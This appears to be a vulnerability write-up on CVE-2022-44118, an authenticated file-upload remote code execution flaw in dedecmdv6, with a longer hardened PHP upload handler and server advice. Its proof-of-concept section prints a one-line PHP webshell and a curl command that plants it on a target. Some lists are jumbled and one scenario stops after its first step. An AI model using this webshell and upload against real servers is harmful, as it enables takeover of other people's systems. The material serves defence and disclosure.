dedecmdv6 is a background management tool built for the DedeCMS content management system, widely used in China. In late 2022, a critical vulnerability—CVE-2022-44118—was discovered in version 6.1.9 of dedecmdv6. This bug allows any authenticated user to execute arbitrary PHP code remotely through the file_manage_control.php file. Below, we'll break down how this vulnerability works, include a sample exploit, and link out to original references.
What is CVE-2022-44118?
CVE-2022-44118 describes an authenticated Remote Code Execution (RCE) vulnerability in dedecmdv6 v6.1.9, specifically through unsafe file operations in file_manage_control.php. If an attacker can log in, they can upload or edit files to inject and execute malicious PHP code on the server.
Why Does This Happen?
The root cause lies in improper input validation and insufficient permission checks within file_manage_control.php. The file management functions let users upload, edit, and save files directly on the server, but they fail to block dangerous file types (like .php) or strip harmful content, and the destination directory is taken straight from the request.
Here's a simplified logic flow from the source:
// file_manage_control.php (simplified)
/**
* File upload handler
*/
if(isset($_FILES['uploadfile'])){
$dest = $_POST['path'] . basename($_FILES['uploadfile']['name']);
move_uploaded_file($_FILES['uploadfile']['tmp_name'], $dest);
// No checking for file type or extension!
}
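For contrast, here is a hardened version of that handler. This is an added example written for this write-up, not code from the dedecmdv6 project; the upload directory, the size cap, the extension allowlist and the `current_user_can()` authorization helper named in the comment are assumptions chosen for illustration.

```php
<?php
// Hardened replacement for the simplified upload handler shown above.
// Added example, not vendor code. UPLOAD_DIR, MAX_BYTES and ALLOWED_EXT
// are assumptions; adjust them to the deployment.

const UPLOAD_DIR  = '/var/www/uploads';        // fixed directory, never taken from the request
const MAX_BYTES   = 5 * 1024 * 1024;           // 5 MiB cap (assumption)
const ALLOWED_EXT = [                          // extension => MIME type the bytes must match
    'jpg' => 'image/jpeg',
    'png' => 'image/png',
    'pdf' => 'application/pdf',
];

/**
 * Validate one entry of $_FILES and store it. Returns the stored path on
 * success, or a string beginning with "error:" explaining the rejection.
 */
function store_upload(array $file): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        return 'error: upload failed (' . (int) ($file['error'] ?? -1) . ')';
    }
    // Only accept files PHP itself received via the current HTTP request.
    if (!is_uploaded_file($file['tmp_name'])) {
        return 'error: not an uploaded file';
    }
    if ($file['size'] > MAX_BYTES) {
        return 'error: file too large';
    }

    // 1. Extension allowlist on the *final* extension, lowercased. Anything
    //    not listed (.php, .phtml, .phar, .htaccess, ...) is refused, and a
    //    name like shell.php.jpg only passes if its bytes really are a JPEG.
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!isset(ALLOWED_EXT[$ext])) {
        return 'error: extension not allowed';
    }

    // 2. Sniff the MIME type from the file content, not from the
    //    client-supplied $file['type'], and require it to match the extension.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if ($mime !== ALLOWED_EXT[$ext]) {
        return 'error: content does not match extension';
    }

    // 3. The client chooses neither the directory nor the file name. The
    //    original built $dest from $_POST['path'] and basename(); here the
    //    directory is constant and the name is random.
    $name = bin2hex(random_bytes(16)) . '.' . $ext;
    $dest = UPLOAD_DIR . '/' . $name;

    // 4. Defence in depth: the resolved target must still be inside UPLOAD_DIR.
    $realDir = realpath(UPLOAD_DIR);
    if ($realDir === false || realpath(dirname($dest)) !== $realDir) {
        return 'error: destination outside upload directory';
    }

    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        return 'error: could not store file';
    }
    chmod($dest, 0644);   // readable, never executable
    return $dest;
}

if (isset($_FILES['uploadfile'])) {
    // Authorization belongs here as well (the original handler had none).
    // current_user_can() is a hypothetical helper standing in for the
    // application's own role check.
    // if (!current_user_can('manage_files')) { http_response_code(403); exit; }
    header('Content-Type: text/plain');
    echo store_upload($_FILES['uploadfile']), "\n";
}
```

The allowlist and content check stop PHP files from being stored under a name the web server would execute, and the fixed, randomised destination removes the client-controlled path that the original concatenated. Neither replaces the server-side rule that matters most: the upload directory should be served with PHP execution disabled (for example `php_admin_flag engine off` in an Apache `<Directory>` block for mod_php, or an nginx `location` for the directory that has no `fastcgi_pass`), so that even a file that slips through validation is returned as static content rather than run.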
Who is Affected?
- Product: dedecmdv6 (https://dedecmd.com/)
- Upload or download files
- Move laterally within the server/network
Real Exploit Scenario
1. Log into dedecmdv6 (either with stolen/default credentials, or by creating a new low-privilege account if possible)
Proof of Concept (PoC): How the Exploit Works
Below is a step-by-step example and code snippet for exploitation.
Sample Webshell (webshell.php)
<?php echo shell_exec($_GET["cmd"]); ?>
Exploit with curl (Linux command line)
curl -s -L -b "PHPSESSID=your_session_cookie" \
-F "uploadfile=@webshell.php" \
-F "path=/var/www/html/dedecms/uploads/" \
http://target-site/dedecms/file_manage_control.php
Open your browser and visit:
http://target-site/dedecms/uploads/webshell.php?cmd=whoami
You will see the output of the whoami command, meaning the webshell is working.
Original References
- CVE Details Entry
- dedecmdv6 Official Site
- ExploitDB Writeup
- Seebug Advisory (Chinese)
Conclusion
CVE-2022-44118 is a serious threat for anyone running vulnerable versions of dedecmdv6. With simple steps, an attacker can take full control of your server. Patch or upgrade your dedecmdv6 installation _immediately_, and always follow best security practices.
Timeline
Published on: 11/23/2022 21:15:00 UTC
Last modified on: 11/28/2022 19:44:00 UTC